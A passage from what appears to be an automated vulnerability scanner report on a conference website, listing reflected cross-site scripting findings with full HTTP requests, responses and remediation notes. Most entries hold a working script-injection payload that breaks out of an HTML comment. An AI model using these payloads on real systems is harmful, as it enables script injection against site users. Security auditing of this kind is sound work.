adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@305a36d4
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.13. http://devoxx.com/display/Devoxx2K10/Oracle [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Oracle

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a2a9c--><script>alert(1)</script>b30a96574db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Oracle?a2a9c--><script>alert(1)</script>b30a96574db=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:20 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842940633
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 35040

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Oracle?a2a9c--><script>alert(1)</script>b30a96574db=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@4caf8a0c
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.14. http://devoxx.com/display/Devoxx2K10/Partners [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Partners

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e7bf9--><script>alert(1)</script>834c95c00a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Partners?e7bf9--><script>alert(1)</script>834c95c00a5=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:04 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842804782
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 34094

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Partners?e7bf9--><script>alert(1)</script>834c95c00a5=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@b64716e
adaptavist.builder.helper: com.atlassi
...[SNIP]...

1.15. http://devoxx.com/display/Devoxx2K10/Practical [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Practical

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 87fb1--><script>alert(1)</script>fa619441419 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Practical?87fb1--><script>alert(1)</script>fa619441419=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:12 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842812479
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 35083

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Practical?87fb1--><script>alert(1)</script>fa619441419=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@7e6b6109
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.16. http://devoxx.com/display/Devoxx2K10/Privacy+Policy [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Privacy+Policy

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 77c41--><script>alert(1)</script>111adc9d0f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Privacy+Policy?77c41--><script>alert(1)</script>111adc9d0f1=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:40 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842960557
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 41989

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Privacy+Policy?77c41--><script>alert(1)</script>111adc9d0f1=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@7874036d
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.17. http://devoxx.com/display/Devoxx2K10/Schedule [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Schedule

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 94dc9--><script>alert(1)</script>2d39d89cec9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Schedule?94dc9--><script>alert(1)</script>2d39d89cec9=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:10 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842810669
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 38725

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Schedule?94dc9--><script>alert(1)</script>2d39d89cec9=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@758d7c42
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.18. http://devoxx.com/display/Devoxx2K10/Schedule+REST+interface [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Schedule+REST+interface

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8b508--><script>alert(1)</script>c8a72497573 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Schedule+REST+interface?8b508--><script>alert(1)</script>c8a72497573=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:41:29 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842889847
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 75562

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Schedule+REST+interface?8b508--><script>alert(1)</script>c8a72497573=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@16ef0c99
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.19. http://devoxx.com/display/Devoxx2K10/Schedules [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Schedules

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload df923--><script>alert(1)</script>b1370082457 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Schedules?df923--><script>alert(1)</script>b1370082457=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:41:17 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842877387
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 44902

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Schedules?df923--><script>alert(1)</script>b1370082457=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@14d4514a
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.20. http://devoxx.com/display/Devoxx2K10/Sidebar [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Sidebar

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload aab21--><script>alert(1)</script>8f8e23b7fa2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Sidebar?aab21--><script>alert(1)</script>8f8e23b7fa2=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:06 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842806553
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 34277

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Sidebar?aab21--><script>alert(1)</script>8f8e23b7fa2=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@7978200a
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.21. http://devoxx.com/display/Devoxx2K10/Sponsors [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Sponsors

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e446f--><script>alert(1)</script>d63727a51fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Sponsors?e446f--><script>alert(1)</script>d63727a51fa=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:32 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842952469
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 42427

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Sponsors?e446f--><script>alert(1)</script>d63727a51fa=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@1aa51ce1
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.22. http://devoxx.com/display/Devoxx2K10/Twitter [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Twitter

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 52c4c--><script>alert(1)</script>5fd2ec3b8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Twitter?52c4c--><script>alert(1)</script>5fd2ec3b8e=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:44 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842964524
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 48598

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Twitter?52c4c--><script>alert(1)</script>5fd2ec3b8e=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@4d21dfd4
adaptavist.builder.helper: com.atlass
...[SNIP]...

1.23. http://devoxx.com/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload a9adf--><script>alert(1)</script>e063112f8a0 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)a9adf--><script>alert(1)</script>e063112f8a0
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: devoxx.com

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:37:55 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842675105
Vary: User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 38366

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)a9adf--><script>alert(1)</script>e063112f8a0'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Home'
contextPath : ''
action name : 'viewpage'
********
...[SNIP]...

1.24. http://devoxx.com/display/Devoxx2K10 [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload cc315--><script>alert(1)</script>b009e1f4053 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)cc315--><script>alert(1)</script>b009e1f4053
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: devoxx.com
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:37:35 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842655791
Vary: User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 38367

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)cc315--><script>alert(1)</script>b009e1f4053'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Home'
contextPath : ''
action name : 'viewpage'
********
...[SNIP]...

1.25. http://devoxx.com/display/Devoxx2K10/Contact+Us [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Contact+Us

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload c556a--><script>alert(1)</script>8d773148ea2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Contact+Us HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c556a--><script>alert(1)</script>8d773148ea2
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:43:04 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842984417
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 35861

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c556a--><script>alert(1)</script>8d773148ea2'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Contact+Us'
contextPath : ''
action name : 'viewpage'
**
...[SNIP]...

1.26. http://devoxx.com/display/Devoxx2K10/Devoxx+2008 [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Devoxx+2008

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload b82a0--><script>alert(1)</script>818a669cdc was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Devoxx+2008 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b82a0--><script>alert(1)</script>818a669cdc
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:45:34 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289843134360
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 140842

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b82a0--><script>alert(1)</script>818a669cdc'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Devoxx+2008'
contextPath : ''
action name : 'viewpage'
*
...[SNIP]...

1.27. http://devoxx.com/display/Devoxx2K10/Devoxx+2009 [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Devoxx+2009

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 739cc--><script>alert(1)</script>1003ca2f40e was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Devoxx+2009 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)739cc--><script>alert(1)</script>1003ca2f40e
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:47:07 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289843227872
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 174347

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
